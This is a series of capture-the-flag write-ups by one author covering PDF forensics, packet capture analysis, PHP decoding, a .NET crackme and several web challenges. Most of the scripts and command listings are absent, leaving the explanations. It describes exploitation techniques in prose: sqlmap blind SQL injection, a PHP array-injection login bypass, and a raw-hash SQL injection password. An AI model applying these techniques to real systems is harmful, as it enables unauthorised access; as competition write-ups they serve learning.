This was the 4th challenge under the misc category which was worth 300 points. A zipped file was provided for this challenge with the following hints:
The zipped file contained a single binary file with no extension. TrID was deployed to identify the extracted file based on its binary signature and was found to be a Adobe PDF file. The file was subsequently renamed with .pdf extension to view its contents using
Adobe PDF Reader.
Only two words (! Confidential Documents !) were displayed when the PDF file was viewed with Adobe PDF Reader. More efforts were required to look further into the PDF specification which encapsulated a complete description of the fixed-layout flat document, including the text, fonts, graphics, and other information needed to display it.
The 1st key was found very easily within object 12. 1st_key(nn@LiC!oU$)
Hints for the 2nd key were discovered within object 5.
Hint #1 mentioned the 2nd key is made up of strings contained in three objects. Hint #2 stated the length of the 2nd key is 14. After scanning through the PDF specification, objects 6, 7, and 8 were found to be likely to contain text strings. The following line was amended to replace the digit 5 with 6, 7, and 8, to display contents of each of the objects in turn.
Object 6 :: PpPDdD[
Object 7 :: F_F
Object 8 :: ]ile
With the above strings concatenated, the 2nd_key was obtained! (PpPDdD[F_F]ile) strlen = 14
Careful examination of the data stream within object 11 was needed for the 3rd key. 1101 bytes of data were extracted and saved to a new binary file. The data were then uncompressed using PHP gzuncompress(), displayed, and found to be another PDF file.
PHP Script:
PDF Specification:
The next lead came from the Javascript contained within object 7.
Some modifications were made to the script in order to view the alert
which read “Decrypt_ME“. The cipher was then changed to
“673B672B3E663C666F2B37390D362061″, a string contained within the
extracted PDF specification, and the 3rd key was revealed. 3rd_key=4n4ly5i5
HTML with Javascript:
Captured the flag with the 3 keys combined! 300 points in the bag!! Yay!!!
Flag: nn@LiC!oU$_PpPDdD[F_F]ile_4n4ly5i5
Cheers,
Braeburn Ladny
The 3rd challenge under the Misc category, with a reward of 200 points, got underway with a binary that was identified as a “Wireshark PCAP Next Generation Dump File Format (Little Endian)” file by TrID.
2 hints were given for this challenge:
- [Misc3(200) Hint] You can solve the question off-line.
- [Misc3(200) Hint] Find out document.
The objective was to find the document in question from the 7161
captured network packets. Thankfully, generating the list of HTTP
objects (File > Export Objects > HTTP) and saving them to a local
directory was a breeze with Wireshark, and a total of 59 files were
exported for analysis.
Sample list of files exported:
When the above selected file was viewed in Adobe PDF Reader, it showed
the official rules for Codegate YUT Challenge. However on closer
examination in notepad, the PDF specification revealed the file had
several incremental updates contained therein, evident by the presence
of several “%%EOF” and updated objects content. The key was revealed
after the last update was deleted from the PDF specification. Flag
captured! 200 points in the bag!! Yay!!!
Cheers,
Braeburn Ladny
This was the second challenge under the misc category which was worth 200 points. Two files were provided, an encoded key and a source php file. The challenge was to write a decoder function to decode the encoded key.
Contents of source.php:
Several points were gathered from the encoder function:
- $enc_tab, an array, comprised of 91 items.
- $var1 contained the (shifted) ASCII value of the input character being processed.
- $var2 contained the number of bits to be processed.
- $var3 contained the working value of $var1.
- If $var1 was between 89 and 8191, and $var2 was more than 13, its value would be shifted right by 13 places, otherwise its value would be shifted right by 14 places. 2 characters would be picked from $enc_tab based on the quotient and remainder from the division operation.
With these points in mind, the decoder function was written to be:
Flag captured! 200 points in the bag!! Yay!!!
Cheers,
Braeburn Ladny
This was the fifth challenge under the web category which was worth 500 points. The challenge kicked off with a note that read “connect with mobile”. Connecting to the website with a stock desktop browser showed the following “mobile only” text.
In came the User Agent Switcher browser extension that switched the user agent to “iPhone 4″, deceived this restriction and gained access to the site. Oh yea!
The site was actually a game simulator where you could create your own character by giving it a name. Each character started off with 150 points to be assigned to its 3 attributes (strength, dexterity and intelligence) depending on your preference. I named my character “wolf”.
Examination of the source code revealed two Javascripts and one of them (main.js) contained obfuscated code.
Contents of main.js:
The obfuscated code was easily deobfuscated by http://jsbeautifier.org/ :)
Line 18 of the above code revealed how URLs for each of the 3 pages (home.html, introduce.html, get_tag.html) were formed. The magic embedded within index.php produced wonders when the script was fed with those parameters – the source code was displayed on the screen! Repeated this step for the php pages (simulator.php, simulator_ok.php) and gathered several valuable hints to this challenge.
Contents of simulator.php:
- Line 15: if ($_POST['name'] == “GM”) die(“you can not view&save with ‘GM’”);
There was a restriction with using “GM” as the character name. GM probably stands for Game Master.
- Line 17: $db = sqlite_open(“/var/game_db/gamesim_”.$_SESSION['scrap'].”.db”);
The path to the character database file!
- Line 94: memo : <input type=’text’ name=’memo’ value=’<?php if (isset($row[0])) echo
gzuncompress($row['memo.memo']); ?>’ maxlength=32 />
Data contained within memo.memo must be uncompressed.
The search for /var/game_db/gamesim_GM.db was conducted and it was discovered to be an SQLite 2.1 database.
After the SQLite database file was extracted from the response, the next step was to write a script to read the contents from it. Recall from hint #3 above, memo.memo must be uncompressed in order to recover its original data.
Script to read database contents:
Key found! 500 points in the bag. Yay!
Cheers,
Braeburn Ladny
This was the third challenge under the web category which was worth 300 points. The challenge began with a letter addressed to Sherlock Holmes.
The objective of this challenge was to play the role of Sherlock Holmes and to figure out who and when the person asked the hacker group to hack “Hound Co.,Ltd.”.
Examination of the site revealed there was a suspicious Javascript file secret.js which was the first lead gathered for this challenge. However the code was clearly obfuscated as shown below.
Contents of secret.js:
The obfuscated code was easily deobfuscated by http://jsbeautifier.org/ :)
Line 8 of this Javascript exposed the hidden php file, d56b699830e77ba53855679cb1d252da.php, which was revealed as a popup after the “Grey” logo was clicked for 10 times. In fact this was the login form. The challenge would be to find the login credentials to gain access to the restricted area.
Candy: md5(login) = d56b699830e77ba53855679cb1d252da
Examination of the site did not show any obvious sign of possible SQL injection flaw. Do you know of any tools that can assist you to look for such flaws?
There are several tools that can automate the process of detecting and exploiting SQL injection flaws and sqlmap, an open source penetration testing tool, is the tool widely used for this purpose.
Command used to identify time-based blind sqli with parameter “question”:
Subsequently commands were issued to identify the databases, tables and table entries:
Put the passwords through md5 decrypter to be decrypted:
Logged in with the credentials for victor and solved the mystery! 300 points in the bag. Yay!
Cheers,
Braeburn Ladny
This was the second challenge under the web category which was worth 200 points. It began with a short note from the organizer that read – “One Time Password..?” and a hyperlink to a Ca$h website where Captain Teemo was on duty.
The Ca$h website included the option to generate a One Time Password (OTP) that was needed during login. Option to download the (zipped) source code for the website was also available.
Contents of the zipped file:
- index.html – Website index page
- jquery-1.8.3.js – JQuery file
- main.js – JQuery file
- images – Folder containing css and image files
- home.php – Homepage containing some description for the website
- login.php – Login page
- login_ok.php – Check the login credentials submitted
- otp.php – Display the OTP and its validity period
- otp_util.php – OTP generation page
Contents of “login_ok.php”:
Contents of “otp.php”:
Contents of “otp_util.php”:
From login_ok.php, it appears you need to submit a password value that matches the value generated by make_otp() and “127.0.0.1″ as the ID value in order to capture the flag for this challenge. A closer look at make_otp() reveals the OTP value is a sha1 hash of a string that is formed by concatenating $time (integer value of the current time divided by 20), $user (“127.0.0.1″), and $seed (md5 hash of the flag file contents concatenate with the md5 hash of the user-agent header) together.
One Time Password (Valid for 20 secs)
There are 2 obstacles to overcome. Let’s examine them in details here:
- $_SERVER["REMOTE_ADDR"] – The IP address from which you are viewing the current page.
Are you able to spoof this to be “127.0.0.1″?
- $_SERVER['HTTP_USER_AGENT'] – Contents of the User-Agent: header from the current request, if there is one. This is a string denoting the user agent being which is accessing the page.
Are you able to match whatever string value used by the organizer?
Take a moment to think about overcoming these 2 obstacles and whether there is an alternative approach to this challenge.
- $_SERVER["REMOTE_ADDR"] – Even though it is possible to spoof this element with “127.0.0.1″, chances are you will not receive the response as the IP address is used in the IP protocol to route packets.
- $_SERVER['HTTP_USER_AGENT'] – It’s anybody’s guess what string was used by the organizer. It may be empty or random.
The 2 obstacles certainly look difficult to overcome. Another approach lies in line 10 of login_ok.php where $_POST["ps"] is compared against $password to determine if there is a match. Comparison between two strings will result in an error when one of the strings supplied is an array. This attack is known as array injection.
Array Injection PHP Script:
When the script (login_ok.php) received this POST request, it ran into an error, rendered the strcpy defunct and echoed the code within the scope of the if statement, together with the contents of the flag file! 200 points in the bag. Yay!
Flag Captured:
Cheers,
Braeburn Ladny
This was the first challenge under the web category which was worth 100 points. It began with a short note from the organizer that read – “Let’s swimming!” and a hyperlink to a member login page which included the option to download the (zipped) source code for the website.
Contents of the zipped file:
- login.php_files – Folder containing css and image files
- db_schema.sql – Database schema file
- login.php.htm – Member login page
- login_check.php – PHP page to check the ID & password entered against the database entry
Contents of “db_scheme.sql”:
Contents of “login_check.php”:
In order to capture the flag for this challenge, you will need to gain access as “admin” so that the contents of “flag.txt” will be read and displayed.
The ID ($id) and password ($ps) values that are submitted to the form will be passed through the mysql_real_escape_string() function to escape special characters. A whirlpool hash for the password value will be calculated thereafter.
It is important to note that when the 3rd parameter for hash() is set to TRUE, the function outputs raw binary data as oppose to lowercase hexits when the parameter is set to FALSE. What this means is that you should not bother to perform bruteforce against the stored password value of ‘f0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0f’ cos it’s fruitless to do so.
The objective is to carefully craft a password value that will create a hash value that can nullify the user_ps parameter and gain admin access! How can you achieve that objective? Take some time to think about this before reading on.
Well to achieve that, you need to make use of type conversion during SQL expression evaluation. With type conversion, in particular string conversion to integer, you need to ensure hash() outputs a string value that matches this format (string1′=’string2). When $ps = string1′=’string2, the SQL statement becomes (select * from users where user_id=’$id’ and user_ps=’string1′=’string2′)
SQL expression evaluation will try to convert string1 and string2 to integer but as they are not integers, they will be cast to 0. Doing an equal comparison between two zeroes will evaluate to TRUE, thus making the latter part of the SQL statement to be TRUE and return all data associated with “admin”. The next step is to create a script to compute passwords that can satisfy the format for this attack to be successful.
Passwords Generation Script:
Passwords Generated:
Using admin and 4075629 as the login credentials will grant you access as admin and have the flag revealed! 100 points in the bag. Yay!
Flag Captured:
Cheers,
Braeburn Ladny
The 1st challenge under the binary category, worthy of 100 points, kicked off with a binary executable given to participants. Through the use of PEiD, the binary was identified to be a “Microsoft Visual C# / Basic .NET” file. Execution of the binary showed it was a simulation program for a door lock.
As no hint was given for the challenge, the next step would be to put the binary through .NET Reflector to decompile and analyse the code. Out of the 13 objects listed in the object browser, 12 were system-related objects. All focus was on the only remaining object “Crack_Test”.
Although Crack_Test contained several methods, there was one particular method that stood out from the rest – void TransFormable(string).
As observed in line 5 & 7, if the two strings matched, a message box would be shown with a decrypted string which might be the flag for this challenge. Gathering data and function code used for decryption within TransFormable() became the next step towards the goal.
With the above information gathered, a simple PHP was written to perform the decryption based on Rijndael cipher.
And the flag was captured! 100 points in the bag!! Yay!
Cheers,
Braeburn Ladny
